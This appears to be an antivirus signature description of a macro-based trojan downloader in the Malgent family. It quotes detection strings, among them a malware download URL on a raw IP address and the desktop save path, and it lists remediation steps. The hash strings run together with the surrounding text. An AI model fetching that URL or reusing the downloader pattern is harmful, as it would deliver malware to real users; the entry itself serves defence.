Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 32-bit Windows platform, family Malgent
This threat is a trojan downloader, typically delivered via a malicious macro within an Office document. The macro attempts to download a secondary malicious payload (boosting.exe) from a remote server (45.78.21.150) and save it to the user's desktop as quotation.exe for execution. This action establishes a foothold on the system for more severe malware infections.
Relevant strings associated with this threat:
- = Environ("USERPROFILE") & "\Desktop" & "\quotation.exe" (MACROHSTR_EXT)
- http://45.78.21.150/boost/boosting.exe (MACROHSTR_EXT)
No specific strings found for this threata12a8dc5fa6562ff4d64e031b57d735d970980060f0d9cb4f0caa526b3cd5caaeffba77be35fb75299883957d3acf9560970a054bc85d20457552e3511293cd0a61dddb469f669b6cc0520593ac23c9f54761070cf700dbe5c694cf34215538ae9b15ced5ae1cc9f93b91f7e23beff15f2801a475cced0ef826653f3b3a89dccIsolate the affected machine from the network. Use antivirus to perform a full system scan and remove all malicious components. Block the C2 IP (45.78.21.150) at the firewall and delete the initial infection vector (e.g., phishing email/document).